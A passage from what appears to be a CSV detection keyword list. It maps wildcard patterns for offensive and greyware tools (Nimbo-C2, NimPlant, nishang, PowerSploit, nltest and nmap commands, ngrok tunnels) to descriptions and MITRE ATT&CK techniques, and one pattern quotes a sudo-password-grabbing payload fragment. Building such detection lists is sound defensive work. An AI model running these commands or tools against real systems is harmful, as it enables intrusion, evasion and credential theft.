","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-UserPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-WmiSession.ps1*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*Nexpose*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://www.rapid7.com/products/nexpose/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nextnet.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*NextronSystems*","offensive_tool_keyword","Github Username","Author of APT simulator","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/NextronSystems","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nginx/striker.log*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ngrok tcp *","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*-nh 127.0.0.1 -nP 7687 -nu neo4j -np *","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*nheiniger/SnaffPoint*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" +"*nhfjkakglbnnpkpldhjmpmmfefifedcj*","greyware_tool_keyword","Pron VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nhnfcgpcbfclhfafjlooihdfghaeinfc*","greyware_tool_keyword","Surf VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Nick Swink aka c0rnbread*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*nickvourd/COM-Hunter*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*nickvourd/Supernova*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Nightmangle-master*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*nikto/program*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*NimBlackout*.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*NimBlackout.*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*NimBlackout-main*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*nimbo_main*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*nimbo_prompt_color*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*nimbo_root*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Nimbo-C2 w1ll r0ck y0ur w0rld*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Nimbo-C2*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Nimbo-C2.*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*nimbo-dependencies*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*nimbuspwn.py*","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","1","N/A","N/A","1","21","5","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" +"*nimcrypt -*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*nimcrypt --file *","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" +"*nimcrypt.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*NimExec.exe*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*NimExec-master*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*NimPlant v*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplant-*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant*.tar.gz*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant*.zip*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplant.db*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.dll*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.nimble*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplantPrint*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplants-*.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplants.html*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimShellCodeLoader*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*NimSyscallLoader -*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Ninja c2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*ninjac2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*nipe.pl *","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" +"*nishang.exe*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*NixImports by dr4k0nia*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*NixImports.csproj*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*NixImports.exe*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*NixImports.git*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*NixImports.sln*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*njpmifchgidinihmijhcfpbdmglecdlb*","greyware_tool_keyword","Trellonet Trellonet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nlbejmccbhkncgokjcmghpfloaajcffj*","greyware_tool_keyword","Hotspot Shield Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nltest /all_trusts*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nltest /dclist*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nltest /domain_trusts*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*nmake inject_local *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*nmap -*","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"*nmap * --script=*.nse*","greyware_tool_keyword","nmap","check exploit for CVEs with nmap","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation Tools","https://nmap.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*nmap -Pn -v -sS -F*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*nmap-*-setup.exe*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*nmap/ncrack*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*nmap_port_scanner.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*nmap_port_scanner_ip_obj.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*nmap_smb_scan_custom_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*nmapAnswerMachine.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*nmap-elasticsearch-nse*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" 